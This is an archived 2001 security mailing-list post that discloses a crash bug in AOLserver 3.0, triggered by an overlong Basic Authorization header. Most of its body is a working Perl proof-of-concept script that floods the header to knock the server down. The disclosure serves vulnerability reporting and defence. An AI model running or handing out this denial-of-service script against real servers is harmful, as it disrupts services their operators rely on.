AOLserver 3.0 vulnerability

From: Nate Haggard (nateat_private)
Date: Wed Aug 22 2001 - 15:51:45 PDT

Next message: Alexander Yurchenko: "Another sendmail exploit"

Previous message: Scott Howard: "Re: Adobe Acrobat creates world writable ~/AdobeFnt.lst files"
Next in thread: Bob Rogers: "AOLserver 3.0 vulnerability"
Reply: Bob Rogers: "AOLserver 3.0 vulnerability"
Reply: KF: "Re: AOLserver 3.0 vulnerability"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Aolserver 3.0 will crash when it is given a long authorization string.  It 
is also possible this vulnerability will allow a hacker to execute 
arbitrary code through a buffer overflow. I have not verified a buffer 
overflow exists.  Aolserver 3.4 and 3.3.1 are not vulnerable to this attack.

Here is a sample exploit:
------------------------------------------
#!/usr/bin/perl
use IO::Socket;
unless (@ARGV == 1) { die "usage: $0 host ..." }
$host = shift(@ARGV);
$remote = IO::Socket::INET->new( Proto     => "tcp",
                                 PeerAddr  => $host,
                                 PeerPort  => "http(80)",
                                 );
unless ($remote) { die "cannot connect to http daemon on $host" }

$junk = "X" x 2048;
$killme = "GET / HTTP/1.0\nAuthorization: Basic ".$junk."\r\n\r\n";
$remote->autoflush(1);
print $remote $killme;
close $remote;


--------------------
Nate Haggard
SecurityLogics.com

Next message: Alexander Yurchenko: "Another sendmail exploit"
Previous message: Scott Howard: "Re: Adobe Acrobat creates world writable ~/AdobeFnt.lst files"
Next in thread: Bob Rogers: "AOLserver 3.0 vulnerability"
Reply: Bob Rogers: "AOLserver 3.0 vulnerability"
Reply: KF: "Re: AOLserver 3.0 vulnerability"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Aug 22 2001 - 17:07:05 PDT